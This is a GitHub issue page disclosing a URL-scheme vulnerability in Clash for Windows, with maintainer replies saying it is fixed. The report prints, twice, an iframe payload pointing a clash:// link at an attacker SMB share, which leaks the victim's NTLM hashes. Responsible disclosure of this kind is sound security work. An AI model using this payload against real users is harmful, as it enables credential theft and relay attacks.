New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Clash for Windows] URL Scheme security issue #910
Comments
|
@burpheart HTTP protocol limit will be added in the next release. Thank you for the report. |
|
Clash for Windows fixed it |
|
affected Product: clash for windows |
|
Hey @burpheart and @Dreamacro ! |
|
Environment
OS: windows
说明 Description
The vulnerability is similar to the TeamViewer CVE-2020-13699 vulnerability.


Attacker could embed a malicious iframe in a website with a crafted URL
(<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
that would launch the Clash Windows client and force it to
open a remote SMB share. Windows will perform NTLM authentication when
opening the SMB share and that request can be relayed (using a tool like
responder) for code execution (or captured for hash cracking).
可能的解决方案 Possible Solution
Limit http or https to get configuration files
更多信息
该漏洞与TeamViewer的CVE-2020-13699漏洞 类似 https://cert.360.cn/warning/detail?id=d31cb7d9342a5ab0973ab2e5e28ddd84
攻击者可以利用精心构造的iframe 拉起Clash应用程序 例如 (<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
并访问指定SMB服务器
当Clash 访问攻击者构造SMB的服务器获取配置文件时
Windows会进行NTLM认证 发送NTLM哈希到攻击者的服务器
攻击者可以利用NTLM哈希进行用户密码破解等操作
该漏洞有一定的危害性
The text was updated successfully, but these errors were encountered: